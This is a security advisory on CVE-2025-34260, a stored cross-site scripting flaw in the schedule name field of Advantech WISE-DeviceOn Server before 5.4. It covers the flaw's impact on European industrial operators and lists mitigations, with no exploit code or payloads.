CVE-2025-34260 is a stored cross-site scripting (XSS) vulnerability identified in Advantech Co., Ltd.'s WISE-DeviceOn Server, specifically affecting versions prior to 5.4. The vulnerability resides in the /rmm/v1/action/schedule endpoint, where authenticated users can add schedules to existing tasks. The schedule name input is not properly sanitized or encoded before being stored and subsequently rendered in schedule listings. This improper neutralization of input (CWE-79) allows an attacker to inject malicious JavaScript code into the schedule name field. When other users view or interact with the schedule listing, the injected script executes within their browser context. This can lead to session hijacking, theft of authentication tokens, or execution of unauthorized actions on behalf of the victim user. The attack requires the attacker to have valid credentials (authenticated user) and some level of user interaction (viewing or interacting with the schedule). The vulnerability has a CVSS 4.0 base score of 5.1, reflecting medium severity, with network attack vector, low attack complexity, no privileges required beyond authentication, and user interaction needed. No public exploits or patches are currently available, increasing the importance of proactive mitigation. The vulnerability affects the confidentiality and integrity of user sessions and could facilitate further compromise within affected environments.

For European organizations, especially those in industrial automation, manufacturing, and critical infrastructure sectors that deploy Advantech WISE-DeviceOn Server, this vulnerability poses a moderate risk. Successful exploitation could allow attackers to hijack user sessions, escalate privileges, and perform unauthorized actions within the device management platform. This could disrupt operational technology (OT) environments, potentially leading to downtime or manipulation of industrial devices. Given the reliance on such platforms for remote monitoring and management, the integrity and availability of industrial processes could be indirectly impacted. The requirement for authentication and user interaction limits the attack surface but does not eliminate risk, particularly in environments with many users or weak credential management. The absence of known exploits reduces immediate threat but also means organizations must be vigilant and proactive. European entities with interconnected IT/OT environments are at risk of lateral movement or further exploitation if this vulnerability is leveraged.

1. Immediately restrict the ability to add or modify schedule names to the minimum necessary set of trusted users to reduce attack surface. 2. Implement strict input validation and sanitization on the schedule name field to disallow or encode potentially malicious characters, even before official patches are available. 3. Apply output encoding/escaping on all user-supplied data rendered in the schedule listings to prevent script execution in browsers. 4. Monitor logs and user activity for unusual schedule creation or modification patterns that could indicate exploitation attempts. 5. Enforce strong authentication mechanisms, including multi-factor authentication (MFA), to reduce risk from compromised credentials. 6. Educate users about the risks of interacting with untrusted schedule entries and encourage reporting of suspicious behavior. 7. Stay updated with Advantech’s advisories and apply patches or updates as soon as they are released. 8. Consider network segmentation to isolate the WISE-DeviceOn Server from less trusted networks and limit exposure. 9. Employ web application firewalls (WAFs) with custom rules to detect and block XSS payloads targeting the affected endpoint.